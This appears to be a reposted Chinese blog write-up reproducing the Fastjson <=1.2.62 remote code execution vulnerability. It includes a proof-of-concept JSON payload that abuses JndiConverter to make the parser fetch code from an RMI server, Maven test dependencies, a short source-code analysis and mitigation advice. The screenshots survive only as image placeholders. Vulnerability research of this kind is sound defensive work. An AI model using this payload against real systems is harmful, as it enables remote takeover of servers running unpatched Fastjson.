首页 > Web开发 > 详细

Fastjson <=1.2.62 远程代码执行-漏洞复现

时间:2020-02-23 13:34:35      阅读:458      评论:0      收藏:0      [点我收藏+]

影响范围:

Fastjson<=1.2.62

需要开启autotype

poc:

String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";

pom:

    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.62</version>
    </dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>


tips:这里需要另外导入jar包才能测试

技术分享图片

该黑名单主要来自于jackson-CVE-2020-8840

https://nvd.nist.gov/vuln/detail/CVE-2020-8840

漏洞复现:

技术分享图片

 

 

漏洞分析

技术分享图片

 

 这里明显存在jndi注入,但是toObjectImpl不满足fastjson调用规则,因此查看其父类函数

技术分享图片

 

 其父类中在toObject函数中调用了它,但是仍然不满足调用条件,因此继续溯源

技术分享图片

 

 可以看到在setAsText函数中调用了toObject函数,并且setAstext满足调用规则,因此payload即打

技术分享图片

 

修复建议:

1.关了autotype,用白名单(推荐)

2.升级jdk()不太现实)

Fastjson <=1.2.62 远程代码执行-漏洞复现

原文:https://www.cnblogs.com/tr1ple/p/12348886.html
(0)
(0)
   
举报
评论 一句话评论(0
分享档案
更多>
2021年09月23日 (328)
2021年09月24日 (313)
2021年09月17日 (191)
2021年09月15日 (369)
2021年09月16日 (411)
2021年09月13日 (439)
2021年09月11日 (398)
2021年09月12日 (393)
2021年09月10日 (160)
2021年09月08日 (222)
最新文章
更多>
教程昨日排行
更多>
友情链接
汇智网   PHP教程   插件网  
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!